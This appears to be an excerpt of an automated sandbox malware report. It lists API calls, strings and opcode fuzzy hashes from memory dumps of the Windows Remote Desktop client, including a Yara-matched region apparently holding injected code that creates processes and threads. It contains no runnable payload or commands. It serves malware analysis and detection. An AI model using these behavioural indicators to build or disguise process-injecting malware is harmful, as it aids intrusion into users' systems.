                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_80000_mstsc.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: CreateThread
                                                                                                                                                                                        • String ID: net.dll
                                                                                                                                                                                        • API String ID: 2422867632-2431746569
                                                                                                                                                                                        • Opcode ID: 1d004fcb14b26e2f7e88d2d1a678fb756f0c3f8ccf331ee9dec8afed24193668
                                                                                                                                                                                        • Instruction ID: 0551f17eff6323511f739c6fd5529b4394743922b787a5dddcad0173efe9557d
                                                                                                                                                                                        • Opcode Fuzzy Hash: 1d004fcb14b26e2f7e88d2d1a678fb756f0c3f8ccf331ee9dec8afed24193668
                                                                                                                                                                                        • Instruction Fuzzy Hash: F101F9772406407BD7349F68DC46FE7B3E8EB84B11F10011DFA6E97281CA70B91087A4

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 202 9a600-9a631 call 9af30 RtlAllocateHeap
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(6E,?,00094CAF,00094CAF,?,00094536,?,?,?,?,?,00000000,00000000,?), ref: 0009A62D
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637430242.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_80000_mstsc.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                                                        • String ID: 6E
                                                                                                                                                                                        • API String ID: 1279760036-729105364
                                                                                                                                                                                        • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                                                                                        • Instruction ID: 1b6272288ef8ffb966947971173dd818e9710902374bf855a6b004b64de9da32
                                                                                                                                                                                        • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                                                                                        • Instruction Fuzzy Hash: 40E012B2210208ABDB14EF99CC41EAB77ACAF88754F118559BA085B242CA30F9118AF0

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 205 9a640-9a671 call 9af30 RtlFreeHeap
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00083AF8), ref: 0009A66D
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637430242.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_80000_mstsc.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: FreeHeap
                                                                                                                                                                                        • String ID: .z`
                                                                                                                                                                                        • API String ID: 3298025750-1441809116
                                                                                                                                                                                        • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                                                                                        • Instruction ID: 2d4e0817c8443f903ef1c354f06224df46c0b170937f898928bd2ea31fb41516
                                                                                                                                                                                        • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                                                                                        • Instruction Fuzzy Hash: A6E04FB12102046BDB14DF99CC45EE777ACEF88750F014555FD0857242C630F910CAF0

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 211 88308-8835a call 9be30 call 9c9d0 call 8acf0 call 94e50 220 8835c-8836e PostThreadMessageW 211->220 221 8838e-88392 211->221 222 8838d 220->222 223 88370-8838b call 8a480 PostThreadMessageW 220->223 222->221 223->222
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0008836A
                                                                                                                                                                                        • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0008838B
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637430242.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_80000_mstsc.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: MessagePostThread
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 1836367815-0
                                                                                                                                                                                        • Opcode ID: 94938422ea648be6d4a06e01588bac6b78417b4ca5487e2cbdb59ad4bcbfba37
                                                                                                                                                                                        • Instruction ID: 4e590e7697db9cbd6bdaa0a76df69adff341a576944ee82d16794fe2e22f38fa
                                                                                                                                                                                        • Opcode Fuzzy Hash: 94938422ea648be6d4a06e01588bac6b78417b4ca5487e2cbdb59ad4bcbfba37
                                                                                                                                                                                        • Instruction Fuzzy Hash: F501FC31A802287AEF21B6949C03FFE7B6CAB41F50F044119FF04BA1C3E6D46A0647E1

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 226 88310-8831f 227 88328-8835a call 9c9d0 call 8acf0 call 94e50 226->227 228 88323 call 9be30 226->228 235 8835c-8836e PostThreadMessageW 227->235 236 8838e-88392 227->236 228->227 237 8838d 235->237 238 88370-8838b call 8a480 PostThreadMessageW 235->238 237->236 238->237
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0008836A
                                                                                                                                                                                        • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0008838B
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637430242.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_80000_mstsc.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: MessagePostThread
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 1836367815-0
                                                                                                                                                                                        • Opcode ID: 11db2db6729fad1b2fe29d12422f9571aab132b5507ffda246947416a0e543a6
                                                                                                                                                                                        • Instruction ID: 339310e7816ee6677ed71e26b38aa137091c1f5ceb856f159559ed380170ccdd
                                                                                                                                                                                        • Opcode Fuzzy Hash: 11db2db6729fad1b2fe29d12422f9571aab132b5507ffda246947416a0e543a6
                                                                                                                                                                                        • Instruction Fuzzy Hash: D6018431A8022877EB20B6949C03FFE776C6B41F50F044115FF44BA1C2EAD46A0647E6
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0009A704
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637430242.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_80000_mstsc.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: CreateInternalProcess
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2186235152-0
                                                                                                                                                                                        • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                                                                                                        • Instruction ID: 19f9a99672ba2ac00871b2559056ee1503211ea5923d2fde956d3060091d1159
                                                                                                                                                                                        • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                                                                                                        • Instruction Fuzzy Hash: 4701B2B2210108BFCB54DF89DC80EEB77ADAF8C754F158258FA0D97241C630E851CBA4
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0008F050,?,?,00000000), ref: 000991BC
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637430242.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_80000_mstsc.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: CreateThread
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2422867632-0
                                                                                                                                                                                        • Opcode ID: 4f83902cf84bfe80aa8c7587155ab907079ac7fc6e7109164a14c7151b30a6b9
                                                                                                                                                                                        • Instruction ID: 567f01684ba44b832d007ff72c8c3be73531e46633ef55d414ab153cd370f68e
                                                                                                                                                                                        • Opcode Fuzzy Hash: 4f83902cf84bfe80aa8c7587155ab907079ac7fc6e7109164a14c7151b30a6b9
                                                                                                                                                                                        • Instruction Fuzzy Hash: 03E06D373802043AEA206699AC02FE7B29C9B81B64F14002AFA4DEA2C2D595F80142A4
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,0008F1D2,0008F1D2,?,00000000,?,?), ref: 0009A7D0
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637430242.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_80000_mstsc.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: LookupPrivilegeValue
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 3899507212-0
                                                                                                                                                                                        • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                                                                                        • Instruction ID: 503748e752a4dd667a2f48f6c13857ae90e473f5abbcc737b5c6dd4122f84ac3
                                                                                                                                                                                        • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                                                                                        • Instruction Fuzzy Hash: 20E01AB12102086BDB10DF89CC85EEB37ADAF89750F018165BA0857242C930E8118BF5
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • SetErrorMode.KERNELBASE(00008003,?,00088D14,?), ref: 0008F6FB
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637430242.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_80000_mstsc.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: ErrorMode
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2340568224-0
                                                                                                                                                                                        • Opcode ID: a2d4a72b799ecba535e6209a82b178d001bd83fc2549ccaf7422d872a4b8c7e9
                                                                                                                                                                                        • Instruction ID: ed2a3b96cedebc315b72bcabaabe6c3ce6085ee93f5df0a30e066fe22c75f057
                                                                                                                                                                                        • Opcode Fuzzy Hash: a2d4a72b799ecba535e6209a82b178d001bd83fc2549ccaf7422d872a4b8c7e9
                                                                                                                                                                                        • Instruction Fuzzy Hash: 08D0A7717503093BEB10FAA49C03F6632CCAB45B04F490074F948D73C3ED50F4014165
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • EndDialog.USER32 ref: 0090DF1B
                                                                                                                                                                                        • GetCursorPos.USER32(?), ref: 0090DF45
                                                                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 0090DF56
                                                                                                                                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0090DF70
                                                                                                                                                                                        • SendMessageW.USER32(?,00001127,?,0000F000), ref: 0090DF8A
                                                                                                                                                                                        • SendMessageW.USER32(?,0000110A,00000003,?), ref: 0090DFB2
                                                                                                                                                                                        • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0090DFE5
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: MessageSend$ClientCursorDialogScreen
                                                                                                                                                                                        • String ID: @
                                                                                                                                                                                        • API String ID: 517287251-2766056989
                                                                                                                                                                                        • Opcode ID: ab2a70adb3c349c1fe2649f30948dd5dfce6977231cbcd39a9a0e05c79db7dfd
                                                                                                                                                                                        • Instruction ID: d91b35de5175e045583c0054e8cb8eb864b57af322391f0c5781ad96df2c0f71
                                                                                                                                                                                        • Opcode Fuzzy Hash: ab2a70adb3c349c1fe2649f30948dd5dfce6977231cbcd39a9a0e05c79db7dfd
                                                                                                                                                                                        • Instruction Fuzzy Hash: 26029970609305AFDB198F64CC85E6ABBE9FF88710F00095DFA85AA2E1D7B2C950DF51
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • lstrcmpiW.KERNEL32(?,Delete,?,?,00000000,00000000,?,008E2849,?,00000000,00000000,00000000,?), ref: 008E21C5
                                                                                                                                                                                        • lstrcmpiW.KERNEL32(?,ForceRemove,?,00000000,00000000,?,008E2849,?,00000000,00000000,00000000,?), ref: 008E21DA
                                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 008E26E4
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: lstrcmpi$Close
                                                                                                                                                                                        • String ID: Delete$ForceRemove$NoRemove$Val
                                                                                                                                                                                        • API String ID: 1559394795-1781481701
                                                                                                                                                                                        • Opcode ID: 4063de436557a7a6f75a52f5891fff4656b7bfb021a57c9481e43b29c486008d
                                                                                                                                                                                        • Instruction ID: 5e1da69d1c1a32b009b18a769326cfc8cb30520ebdd1b99a9bc6e3bb5df72141
                                                                                                                                                                                        • Opcode Fuzzy Hash: 4063de436557a7a6f75a52f5891fff4656b7bfb021a57c9481e43b29c486008d
                                                                                                                                                                                        • Instruction Fuzzy Hash: A6F16F715083969BDB25EF66C855A2FB7ECFF9AB04F000A1DF941E6250DB70DD408BA2
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • DefWindowProcW.USER32(?,?,?,?), ref: 008E9B4E
                                                                                                                                                                                        • IsIconic.USER32(?), ref: 008E9C42
                                                                                                                                                                                        • GetClientRect.USER32(?,?,?), ref: 008E9CDA
                                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 008E9F0B
                                                                                                                                                                                        • CheckMenuItem.USER32 ref: 008E9FCF
                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 008E9D0B
                                                                                                                                                                                          • Part of subcall function 008E1040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 008E106D
                                                                                                                                                                                          • Part of subcall function 008E1040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 008E107F
                                                                                                                                                                                          • Part of subcall function 008E1040: FreeLibrary.KERNEL32(?), ref: 008E1094
                                                                                                                                                                                          • Part of subcall function 008E10B1: TraceMessage.ADVAPI32(00000000,008E396B,0000002B,008D7B50,0000000D,00913C39,00000004,00000000,?,00913C39,008E396B,00000000,00000000), ref: 008E10C8
                                                                                                                                                                                        Strings
                                                                                                                                                                                        • put_Property(UTREG_UI_SHOWSESSIONDIAGNOSTICS) failed!, xrefs: 008E9EE4
                                                                                                                                                                                        • ShowSessionDiagnostics, xrefs: 008E9EBE
                                                                                                                                                                                        • put_Property(UTREG_UI_SHOWGATEWAYINFORMATION) failed!, xrefs: 008EA267
                                                                                                                                                                                        • put_FullScreen failed!, xrefs: 008E9AC1, 008E9BCF, 008E9C85
                                                                                                                                                                                        • put_FullScreen(VARIANT_TRUE) failed!, xrefs: 008EA14D
                                                                                                                                                                                        • SyncSessionDisplaySettings failed!, xrefs: 008E9B21
                                                                                                                                                                                        • ShowGatewayInformation, xrefs: 008EA231
                                                                                                                                                                                        • QueryInterface failed for IMsRdpExtendedSettings, xrefs: 008E9E74, 008EA1F2
                                                                                                                                                                                        • HELP_ENTRY_ID_REMOTE_DESKTOP_HELP_BUTTON, xrefs: 008EA055
                                                                                                                                                                                        • mshelp://windows/?id=f55326fa-e629-423b-abba-b30f76cc61e6, xrefs: 008EA05A
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Proc$AddressCheckClearClientErrorFreeHandleIconicItemLastLibraryMenuMessageModuleRectTraceVariantWindow
                                                                                                                                                                                        • String ID: HELP_ENTRY_ID_REMOTE_DESKTOP_HELP_BUTTON$QueryInterface failed for IMsRdpExtendedSettings$ShowGatewayInformation$ShowSessionDiagnostics$SyncSessionDisplaySettings failed!$mshelp://windows/?id=f55326fa-e629-423b-abba-b30f76cc61e6$put_FullScreen failed!$put_FullScreen(VARIANT_TRUE) failed!$put_Property(UTREG_UI_SHOWGATEWAYINFORMATION) failed!$put_Property(UTREG_UI_SHOWSESSIONDIAGNOSTICS) failed!
                                                                                                                                                                                        • API String ID: 1785777579-2258313333
                                                                                                                                                                                        • Opcode ID: c3bffa782b61763dffdf88f4155a8f7576efb9d4b83c230bd26e8788ef941326
                                                                                                                                                                                        • Instruction ID: 370bb2eb5f2891059ff9dd8a9d6d7f3c1011341fa7f1ebc2b65a11119f118300
                                                                                                                                                                                        • Opcode Fuzzy Hash: c3bffa782b61763dffdf88f4155a8f7576efb9d4b83c230bd26e8788ef941326
                                                                                                                                                                                        • Instruction Fuzzy Hash: 6342D030600385AFDB6DCF5AC888FA97BA6FF06714F140199E545DB2A2C7B1E890DF12
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • memset.MSVCRT ref: 009269DC
                                                                                                                                                                                        • CertFreeCertificateChain.CRYPT32(00000000,?,?,?,?,00000000,?), ref: 00926CF6
                                                                                                                                                                                          • Part of subcall function 008E1040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 008E106D
                                                                                                                                                                                          • Part of subcall function 008E1040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 008E107F
                                                                                                                                                                                          • Part of subcall function 008E1040: FreeLibrary.KERNEL32(?), ref: 008E1094
                                                                                                                                                                                        Strings
                                                                                                                                                                                        • CertChainContextToArray failed, xrefs: 00926B07
                                                                                                                                                                                        • attempt to sign with missing certificate/data, xrefs: 00926D20
                                                                                                                                                                                        • attempt to sign with invalid signer certificate, xrefs: 00926A41
                                                                                                                                                                                        • 1.3.14.3.2.26, xrefs: 00926B6A
                                                                                                                                                                                        • pbSignedBlob, xrefs: 00926C15
                                                                                                                                                                                        • Unable to construct cert chain for signing, xrefs: 00926AA1
                                                                                                                                                                                        • D, xrefs: 00926B39
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Free$AddressCertCertificateChainHandleLibraryModuleProcmemset
                                                                                                                                                                                        • String ID: 1.3.14.3.2.26$CertChainContextToArray failed$D$Unable to construct cert chain for signing$attempt to sign with invalid signer certificate$attempt to sign with missing certificate/data$pbSignedBlob
                                                                                                                                                                                        • API String ID: 2430148879-1874413065
                                                                                                                                                                                        • Opcode ID: f922f0c991851236725fa50ba10c2b6ccba4fa03e44d9d9e9db39edfdb6cfe13
                                                                                                                                                                                        • Instruction ID: b9d6f85b4c24624de85947aee236c89ef5e570a6fab6b491a49cee24af7315c2
                                                                                                                                                                                        • Opcode Fuzzy Hash: f922f0c991851236725fa50ba10c2b6ccba4fa03e44d9d9e9db39edfdb6cfe13
                                                                                                                                                                                        • Instruction Fuzzy Hash: 81A1FE72604364AFC728EF68E845F267BE9FB49310F04091AFAC0DB6A5C774DC449B92
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • LoadCursorW.USER32 ref: 008EC8FB
                                                                                                                                                                                        • SetCursor.USER32(00000000), ref: 008EC902
                                                                                                                                                                                        • DefWindowProcW.USER32(?,00000117,?,?), ref: 008ECBA6
                                                                                                                                                                                        • IsIconic.USER32(?), ref: 008ECC41
                                                                                                                                                                                          • Part of subcall function 008E88BF: IsIconic.USER32(?), ref: 008E8904
                                                                                                                                                                                          • Part of subcall function 008E88BF: GetWindowPlacement.USER32(?,?), ref: 008E8915
                                                                                                                                                                                          • Part of subcall function 008E88BF: GetLastError.KERNEL32 ref: 008E891F
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: CursorIconicWindow$ErrorLastLoadPlacementProc
                                                                                                                                                                                        • String ID: ,$FALSE$HELP_ENTRY_ID_REMOTE_DESKTOP_HELP_BUTTON$SyncSessionDisplaySettings failed$TRUE$e$get_RemoteMonitorCount failed!$mshelp://windows/?id=f55326fa-e629-423b-abba-b30f76cc61e6
                                                                                                                                                                                        • API String ID: 1251360991-567463105
                                                                                                                                                                                        • Opcode ID: 66337046a4040cb75207b3d81fea6fe5e123083aa2b888b05b66bffc2ed7b27c
                                                                                                                                                                                        • Instruction ID: 32225fbee94b5d0f50d8a43120237c66ea6a7cbc2685e0fc80b18e897200be14
                                                                                                                                                                                        • Opcode Fuzzy Hash: 66337046a4040cb75207b3d81fea6fe5e123083aa2b888b05b66bffc2ed7b27c
                                                                                                                                                                                        • Instruction Fuzzy Hash: C812D231A043859FDB299F6AC959E6E7BA6FF8A304F00042CF542D72A1CB71DC52DB52
                                                                                                                                                                                        APIs
                                                                                                                                                                                          • Part of subcall function 008E1040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 008E106D
                                                                                                                                                                                          • Part of subcall function 008E1040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 008E107F
                                                                                                                                                                                          • Part of subcall function 008E1040: FreeLibrary.KERNEL32(?), ref: 008E1094
                                                                                                                                                                                        • LockWindowUpdate.USER32(?), ref: 008EB460
                                                                                                                                                                                        • IsIconic.USER32(?), ref: 008EB48C
                                                                                                                                                                                        • GetWindowPlacement.USER32(?,?), ref: 008EB49E
                                                                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 008EB4C3
                                                                                                                                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 008EB4DA
                                                                                                                                                                                        • SetWindowLongW.USER32(?,000000F4,00000000), ref: 008EB4E3
                                                                                                                                                                                        • ShowWindow.USER32(?,00000009), ref: 008EB5B5
                                                                                                                                                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000030), ref: 008EB5E3
                                                                                                                                                                                        • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000215), ref: 008EB5F8
                                                                                                                                                                                        • LockWindowUpdate.USER32(00000000), ref: 008EB5FB
                                                                                                                                                                                          • Part of subcall function 008F426E: CopyRect.USER32(?,?), ref: 008F42C6
                                                                                                                                                                                        Strings
                                                                                                                                                                                        • ,, xrefs: 008EB484
                                                                                                                                                                                        • get_RemoteMonitorCount failed!, xrefs: 008EB3E6
                                                                                                                                                                                        • QI for IID_IMsRdpClientNonScriptable5 failed!, xrefs: 008EB37F
                                                                                                                                                                                        • get_RemoteMonitorLayoutMatchesLocal failed!, xrefs: 008EB43D
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Window$Long$LockUpdate$AddressCopyFreeHandleIconicLibraryModulePlacementProcRectShow
                                                                                                                                                                                        • String ID: ,$QI for IID_IMsRdpClientNonScriptable5 failed!$get_RemoteMonitorCount failed!$get_RemoteMonitorLayoutMatchesLocal failed!
                                                                                                                                                                                        • API String ID: 151203323-4160434392
                                                                                                                                                                                        • Opcode ID: 20bc5c0c7b9c9001125edc600c10ae33ba1587d26669c8b71d75952a1689b532
                                                                                                                                                                                        • Instruction ID: 65f03b08b649c1a079b4aa0cadc4ae9e18bb4408ba784b24d893149e90c120e8
                                                                                                                                                                                        • Opcode Fuzzy Hash: 20bc5c0c7b9c9001125edc600c10ae33ba1587d26669c8b71d75952a1689b532
                                                                                                                                                                                        • Instruction Fuzzy Hash: 5691AE71508380AFDB14DF26C889A2BBBE5FF85718F14496DF958DA2A2DB30D801CF52
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • memset.MSVCRT ref: 0092C43C
                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(?), ref: 0092C485
                                                                                                                                                                                        • ProcessIdToSessionId.KERNEL32(00000000), ref: 0092C48C
                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 0092C496
                                                                                                                                                                                        • RpcBindingFree.RPCRT4(?), ref: 0092CA17
                                                                                                                                                                                          • Part of subcall function 0092F7B6: DeleteCriticalSection.KERNEL32(?,?), ref: 0092F7EA
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Process$BindingCriticalCurrentDeleteErrorFreeLastSectionSessionmemset
                                                                                                                                                                                        • String ID: RpcShadow2 failed$SetTitle failed
                                                                                                                                                                                        • API String ID: 69563327-3302378902
                                                                                                                                                                                        • Opcode ID: 60a20f833b2c7f5df3ddbd90761589352e9beeb6499a84fba60c120aae13b390
                                                                                                                                                                                        • Instruction ID: f9c9a6948ed3d7a3d997347d52bf0e6d4ae5cb757271657f02d016fac2681d85
                                                                                                                                                                                        • Opcode Fuzzy Hash: 60a20f833b2c7f5df3ddbd90761589352e9beeb6499a84fba60c120aae13b390
                                                                                                                                                                                        • Instruction Fuzzy Hash: 9BE1E0B1900365AFCB29DF18EC44F6E3BAABB09300F14419AE544EB269D735DD80DF55
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • CryptVerifyDetachedMessageSignature.CRYPT32(?,00000000,?,?,00000001,?), ref: 009271F3
                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00927203
                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00927237
